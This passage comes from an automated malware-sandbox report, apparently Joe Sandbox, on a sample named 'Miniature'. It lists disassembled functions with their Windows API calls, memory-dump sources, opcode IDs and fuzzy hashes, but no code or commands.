                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: CloseHandleSleep
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 252777609-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                                                                                                                                                                                            • Instruction ID: da7b187df716fcd769faa7081b4805ebceecf6ebe72448991531ab0e9b96e73c
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1E31D272A10105DFC718CF59D4A0A69FBA6FB49300F3486A5E45ACB252D732EEC1CBC0
                                                                                                                                                                                                                                                                                            Function 00C1CAB0 Relevance: 2.1, APIs: 1, Instructions: 587COMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • __Init_thread_footer.LIBCMT ref: 00C1CEEE
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Init_thread_footer
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 1385522511-0
                                                                                                                                                                                                                                                                                            • Opcode ID: cbf4e0f386306b916ddec8536f00ef8729807c09f177a47cd94d12b0294e4a76
                                                                                                                                                                                                                                                                                            • Instruction ID: 3055a7d5b689af68d39eda3185eb3fa87b6a275f35b125cc8a19cf167be36495
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: cbf4e0f386306b916ddec8536f00ef8729807c09f177a47cd94d12b0294e4a76
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8732AF74A442459FCB20DF59C8C4ABEB7B5EF46354F188059FC26AB251C734EE82EB90
                                                                                                                                                                                                                                                                                            Function 00C97AF9 Relevance: 1.8, APIs: 1, Instructions: 326COMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: LoadString
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 2948472770-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 5cb362fb99751cb98f2185cf2189038d7bd0aaf32ff1a7b82df6633395d5a6ab
                                                                                                                                                                                                                                                                                            • Instruction ID: 7c88c329abf43ab38b49f9ec5c51564d00e8348b00021114914ef9414016f3f1
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5cb362fb99751cb98f2185cf2189038d7bd0aaf32ff1a7b82df6633395d5a6ab
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 06D17B35A1520AEFCF14EF98C8859EDBBB5FF48310F144259E915AB291DB30AE81DF90
                                                                                                                                                                                                                                                                                            Function 00C3F106 Relevance: 1.7, APIs: 1, Instructions: 151COMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                                            • Opcode ID: 630c5b5e054bd67d0d8c422103838780b828fe2a14fa6a40cfdc944db0464ca1
                                                                                                                                                                                                                                                                                            • Instruction ID: 3bfdb7c34bf82fba6d3e97340a9037565690b4928a9ff8fad79ef5897b9c8f81
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 630c5b5e054bd67d0d8c422103838780b828fe2a14fa6a40cfdc944db0464ca1
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8451D635E10108EFDB11DF68D841BAA7BA1EB85364F19856CF8189B391D732AE43CB90
                                                                                                                                                                                                                                                                                            Function 00C7FCB5 Relevance: 1.6, APIs: 1, Instructions: 136COMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • CharLowerBuffW.USER32(?,?), ref: 00C7FCCE
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: BuffCharLower
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 2358735015-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 109dc92c10a4ab02005ced7afd641207f4d2a9da7508aaa5d25b0f04265db2b0
                                                                                                                                                                                                                                                                                            • Instruction ID: d0a0f71181f6091d3c4f58d6f021df8868b6165027dce6396039cd8a707b579a
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 109dc92c10a4ab02005ced7afd641207f4d2a9da7508aaa5d25b0f04265db2b0
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8441B672500209AFDB21EFA8C8819AEB7F9EF54314B20853EE51697251EB70DF45DB50
                                                                                                                                                                                                                                                                                            Function 00C16679 Relevance: 1.6, APIs: 1, Instructions: 65libraryCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C1663E: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00C1668B,?,?,00C162FA,?,00000001,?,?,00000000), ref: 00C1664A
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C1663E: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00C1665C
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C1663E: FreeLibrary.KERNEL32(00000000,?,?,00C1668B,?,?,00C162FA,?,00000001,?,?,00000000), ref: 00C1666E
                                                                                                                                                                                                                                                                                            • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,?,00C162FA,?,00000001,?,?,00000000), ref: 00C166AB
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C16607: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00C55657,?,?,00C162FA,?,00000001,?,?,00000000), ref: 00C16610
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C16607: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00C16622
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C16607: FreeLibrary.KERNEL32(00000000,?,?,00C55657,?,?,00C162FA,?,00000001,?,?,00000000), ref: 00C16635
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Library$Load$AddressFreeProc
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 2632591731-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 2bd9b3a527911f2c71ffdcfa432f73445c29cd139720cff49ebd7a4cf716b15b
                                                                                                                                                                                                                                                                                            • Instruction ID: 1708984426d78e710e465c8dad615e94641d10b962df5d3090e7b590272958ed
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2bd9b3a527911f2c71ffdcfa432f73445c29cd139720cff49ebd7a4cf716b15b
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CA11C172600205AACB14AB20C802BED7BA59F52715F10842DF493A61C2EEB5DA85FB54
                                                                                                                                                                                                                                                                                            Function 00C48782 Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: __wsopen_s
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 3347428461-0
                                                                                                                                                                                                                                                                                            • Opcode ID: e802792c99f09329da69c98b3a1ce1c6cb97cf9797fb712e724db957fdc114f8
                                                                                                                                                                                                                                                                                            • Instruction ID: 291ccbe7421e9348079eb9d59586c7c527e0f43dd2e14504df5706ad6263a373
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e802792c99f09329da69c98b3a1ce1c6cb97cf9797fb712e724db957fdc114f8
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F21118B590420AAFCF05DF58E945A9E7BF4FF48310F114069FC09EB311DA31EA258B65
                                                                                                                                                                                                                                                                                            Function 00C45373 Relevance: 1.6, APIs: 1, Instructions: 52COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C44FF0: RtlAllocateHeap.NTDLL(00000008,00000001,00000000,?,00C4319C,00000001,00000364,?,?,?,0000000A,00000000), ref: 00C45031
                                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00C453DF
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: AllocateHeap_free
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 614378929-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 5c7edad85fedc96dc17405c694b3f8ca8b3e31a6960b62d958f97a24a2444c6c
                                                                                                                                                                                                                                                                                            • Instruction ID: 3e882ac3ac192611ae40c299def0b8a3c6bcf66150563a467724d0f14cb61589
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5c7edad85fedc96dc17405c694b3f8ca8b3e31a6960b62d958f97a24a2444c6c
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2B0149B66003046BE3318F69D881A5AFBEDFB85370F65052DE59483281EB70A905C774
                                                                                                                                                                                                                                                                                            Function 00C3E972 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                                            • Opcode ID: eb1dcaca3f7520121673565f353bd58828d6484f0fca4c940b7c4def7923b9e8
                                                                                                                                                                                                                                                                                            • Instruction ID: 93f7425a445996a5af13a5401222e8a315e79ef35877ad1bcc8322ee93168b3a
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: eb1dcaca3f7520121673565f353bd58828d6484f0fca4c940b7c4def7923b9e8
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9DF0C832521B2097D6323A6BAC06BDB33989F42335F100B26F965971D2EB74E90697D2
                                                                                                                                                                                                                                                                                            Function 00C1B329 Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: _wcslen
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 176396367-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 0e202e1a96b257e732cb852cd093bfd3ec71c09a98889d0bf34eb9e08264d460
                                                                                                                                                                                                                                                                                            • Instruction ID: 7386cb0c94547129bf5c14f087931373bd1f1219d6068de51fe8942879f3f90c
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0e202e1a96b257e732cb852cd093bfd3ec71c09a98889d0bf34eb9e08264d460
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 62F0CD735117046ED7149F29D806BA7BB54EB44760F50812AFA19CB1D1DB31E550DB90
                                                                                                                                                                                                                                                                                            Function 00C8F94A Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetEnvironmentVariableW.KERNEL32(?,?,00007FFF,00000000), ref: 00C8F987
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: EnvironmentVariable
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 1431749950-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 9773a2f35e9a564509c261ea564891f7b3e75c9f7502cd0c53d1ebbed8d9e368
                                                                                                                                                                                                                                                                                            • Instruction ID: 94a2fbfec4935d5c877b1cc8072c2fc324d05527b0737f0960082eea320684ac
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9773a2f35e9a564509c261ea564891f7b3e75c9f7502cd0c53d1ebbed8d9e368
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F0F08C72610204BFCB04EBA5CC46E9F7BB8EF4A724F004054F505AB260EA70AE81E760
                                                                                                                                                                                                                                                                                            Function 00C44FF0 Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • RtlAllocateHeap.NTDLL(00000008,00000001,00000000,?,00C4319C,00000001,00000364,?,?,?,0000000A,00000000), ref: 00C45031
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: AllocateHeap
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 1279760036-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 166f17d60781418e7afec800919d6c8d7493ee61408e0b4852c48ffbe5e93284
                                                                                                                                                                                                                                                                                            • Instruction ID: c71624132c6ba90e773d3d2459e75018539df785f28f818c84844ebb45366fbc
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 166f17d60781418e7afec800919d6c8d7493ee61408e0b4852c48ffbe5e93284
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: FBF0E23A620E20A7DB312E26DC01F5B3758BF417F0F158021B825DB0A2DA70DE019AE0
                                                                                                                                                                                                                                                                                            Function 00C43B93 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • RtlAllocateHeap.NTDLL(00000000,?,?,?,00C36A79,?,0000015D,?,?,?,?,00C385B0,000000FF,00000000,?,?), ref: 00C43BC5
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: AllocateHeap
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 1279760036-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 52792616bc5e0e2672fd5e5e12b9ec5d0f8d2e9ccaa4e9c44a20ba4a5b0865ca
                                                                                                                                                                                                                                                                                            • Instruction ID: d01fa92723bfb3a1383efeeac77fdf6412aff45041f3c156d393552f43f91e1f
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 52792616bc5e0e2672fd5e5e12b9ec5d0f8d2e9ccaa4e9c44a20ba4a5b0865ca
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 31E06D21250AA0A7DA2236769C02F5B7A5CFF813A0F1501A1FC7596AA1DB60CF4095E1
                                                                                                                                                                                                                                                                                            Function 00C166E7 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
